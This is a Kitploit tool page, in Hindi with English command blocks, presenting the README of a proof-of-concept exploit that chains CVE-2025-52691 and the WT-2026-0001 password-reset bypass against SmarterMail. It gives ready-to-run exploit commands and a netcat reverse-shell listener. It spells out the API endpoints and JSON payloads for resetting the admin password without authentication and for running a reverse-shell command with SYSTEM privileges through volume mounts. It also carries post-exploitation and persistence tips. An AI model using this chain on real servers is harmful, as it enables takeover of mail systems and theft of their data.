Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001 — CVE-2025-52691 PoC: watchtowr के लेख WT-2026-0001 पर आधारित, जो एक प्रमाणीकरण बायपास एक्सप्लॉइट के बारे में है, यह एक कार्यात्मक Python अटैक स्क्रिप्ट है। | Kitploit
उपकरण/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंगरिमोट एक्सेस टूल
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC: watchtowr के लेख WT-2026-0001 पर आधारित, जो एक प्रमाणीकरण बायपास एक्सप्लॉइट के बारे में है, यह एक कार्यात्मक Python अटैक स्क्रिप्ट है।

रिपॉजिटरी देखें
77 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-52691 / WT-2026-0001 SmarterMail एक्सप्लॉइट

🚨 महत्वपूर्ण सूचना

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है!

  • अनधिकृत उपयोग अवैध और अनैतिक है
  • केवल स्पष्ट प्राधिकरण वाले सिस्टम पर उपयोग करें
  • अपने जोखिम पर उपयोग करें
  • उपयोगकर्ता सभी लागू कानूनों का अनुपालन करने के लिए जिम्मेदार हैं

📋 अवलोकन

यह एक्सप्लॉइट SmarterMail में दो गंभीर कमजोरियों को जोड़ता है:

  1. CVE-2025-52691: फ़ाइल अपलोड के माध्यम से प्री-ऑथ रिमोट कोड निष्पादन
    • CVSS स्कोर: 10.0 (गंभीर)
    • प्रभावित संस्करण: बिल्ड 9406 और उससे पहले, बिल्ड 16.3.6989.16341 और उससे पहले
    • सुधारित संस्करण: बिल्ड 9413 और उसके बाद

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001: पासवर्ड रीसेट के माध्यम से प्रमाणीकरण बाइपास
    • CVE-ID निर्धारित नहीं
    • प्रभावित संस्करण: बिल्ड 9510 तक
    • सुधारित संस्करण: बिल्ड 9511 (15 जनवरी, 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

हमला वेक्टर

यह एक्सप्लॉइट 3-चरणीय हमला करता है:

  1. चरण 1: WT-2026-0001 के माध्यम से प्रमाणीकरण बाइपास

    • पुराने पासवर्ड के सत्यापन के बिना एडमिन पासवर्ड बदलें
  2. चरण 2: नए पासवर्ड के साथ एडमिन लॉगिन

    • SmarterMail वेब इंटरफ़ेस में प्रमाणित करें
  3. चरण 3: वॉल्यूम माउंट्स कार्यक्षमता के माध्यम से RCE

    • रिवर्स शेल कमांड के साथ वॉल्यूम माउंट बनाएं
    • SYSTEM विशेषाधिकारों के साथ OS कमांड निष्पादित करें

पूर्वापेक्षाएँ

सिस्टम आवश्यकताएँ

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

स्थापना निर्देश

root@kitploit:~
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Install netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

निर्भरताएँ स्थापित करें

root@kitploit:~
# Python dependencies (if needed)
pip3 install requests

त्वरित प्रारंभ

विधि 1: स्वचालित सेटअप (अनुशंसित)

root@kitploit:~
# Make executable
chmod +x run_exploit.sh

# Automated setup
./run_exploit.sh --auto

# Or interactive setup
./run_exploit.sh

विधि 2: प्रत्यक्ष निष्पादन

root@kitploit:~
# Setup listener (in one terminal)
nc -lvnp 4444

# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

विधि 3: सभी विकल्पों के साथ

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

विस्तृत निर्देश

चरण 1: तैयारी

  1. लक्ष्य पहचान

    root@kitploit:~
    # Check target host
    curl -I http://192.168.1.100:9998
    
    # Identify SmarterMail version
    # (Usually in login page or HTTP headers)
    
  2. लिसनर सेटअप

    root@kitploit:~
    # In Terminal 1: Start listener
    nc -lvnp 4444
    
    # The listener must be running before the exploit is executed
    
  3. नेटवर्क सत्यापन

    root@kitploit:~
    # Ensure connection between attacker and target is possible
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

चरण 2: एक्सप्लॉइट निष्पादन

root@kitploit:~
# With the runner script (recommended)
./run_exploit.sh

# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

चरण 3: एक्सप्लॉइट के बाद

  1. शेल कनेक्शन

    root@kitploit:~
    # In the listener terminal, a connection should now appear
    # You should have a SYSTEM shell
    
  2. पहुँच सत्यापित करें

    root@kitploit:~
    # In the obtained shell
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. स्थायी पहुँच

    root@kitploit:~
    # Optional: Set up persistence
    # Windows: Install as service
    # Linux: Cron job or systemd service
    

🔧 कॉन्फ़िगरेशन विकल्प

Exploit.py पैरामीटर

पैरामीटरविवरणडिफ़ॉल्ट मान
-H, --hostलक्ष्य होस्ट (आवश्यक)-
-P, --portलक्ष्य पोर्ट9998
-A, --attacker-ipरिवर्स शेल के लिए हमलावर IP (आवश्यक)-
-p, --attacker-portरिवर्स शेल के लिए हमलावर पोर्ट (आवश्यक)-
-d, --debugडीबग मोड सक्षम करेंFalse
--admin-usernameएडमिन उपयोगकर्ता नामadmin
--new-passwordनया एडमिन पासवर्डNewPassword123!@#

Run_Exploit.sh पैरामीटर

पैरामीटरविवरण
-t, --targetलक्ष्य होस्ट
-p, --portलक्ष्य पोर्ट
-a, --attacker-ipहमलावर IP
-l, --listener-portलिसनर पोर्ट
-n, --new-passwordनया एडमिन पासवर्ड
-u, --admin-userएडमिन उपयोगकर्ता नाम
-d, --debugडीबग मोड
--autoस्वचालित मोड

उदाहरण

उदाहरण 1: बुनियादी उपयोग

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

उदाहरण 2: कस्टम क्रेडेंशियल्स के साथ

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

उदाहरण 3: डीबग मोड

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

उदाहरण 4: स्वचालित सेटअप

root@kitploit:~
./run_exploit.sh --auto

तकनीकी विवरण

चरण 1: प्रमाणीकरण बाइपास

एंडपॉइंट: POST /api/v1/auth/force-reset-password

पेलोड:

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

सफलता प्रतिक्रिया:

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

चरण 2: एडमिन लॉगिन

एंडपॉइंट: POST /api/v1/auth/login

पेलोड:

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

चरण 3: वॉल्यूम माउंट्स के माध्यम से RCE

एंडपॉइंट: POST /api/v1/settings/volume-mounts

पेलोड:

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

समस्या निवारण

सामान्य समस्याएँ

1. पोर्ट ब्लॉक है

root@kitploit:~
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998

2. लिसनर पहुँच योग्य नहीं है

root@kitploit:~
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444

3. प्रमाणीकरण विफल

root@kitploit:~
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)

5. RCE विफल

root@kitploit:~
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system

डीबग मोड

विस्तृत आउटपुट के लिए डीबग मोड सक्षम करें:

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ सुरक्षा नोट्स

कानूनी पहलू

  • केवल अधिकृत परीक्षण करें
  • लिखित अनुमति प्राप्त करें
  • स्थानीय कानूनों का अनुपालन सुनिश्चित करें
  • प्रोडक्शन सिस्टम पर परीक्षण न करें

सुरक्षा सावधानियाँ

  1. परीक्षण वातावरण: हमेशा नियंत्रित वातावरण में परीक्षण करें
  2. लक्ष्य सत्यापन: सुनिश्चित करें कि लक्ष्य एक परीक्षण प्रणाली है
  3. नेटवर्क अलगाव: परीक्षण प्रणालियों को प्रोडक्शन नेटवर्क से अलग रखें
  4. प्रलेखन: सभी परीक्षणों का दस्तावेज़ीकरण करें
  5. सफाई: परीक्षण के बाद सभी निशान हटाएँ

जिम्मेदार उपयोग

  • नुकसान न पहुँचाएँ
  • डेटा चोरी या हेरफेर न करें
  • सिस्टम को निष्क्रिय न करें
  • जिम्मेदार पक्षों के प्रति पारदर्शी रहें

अपडेट और रखरखाव

संस्करण नोट्स

  • v1.0: पूर्ण कार्यक्षमता के साथ प्रारंभिक संस्करण
  • भविष्य के अपडेट: त्रुटि प्रबंधन और स्थिरता में सुधार

🙏 आभार

  • watchTowr Labs मूल शोध के लिए
  • सुरक्षा अनुसंधान समुदाय समर्थन के लिए
  • सभी जिन्होंने सुधारों में योगदान दिया

⚠️ याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है!

टूल डाउनलोड करें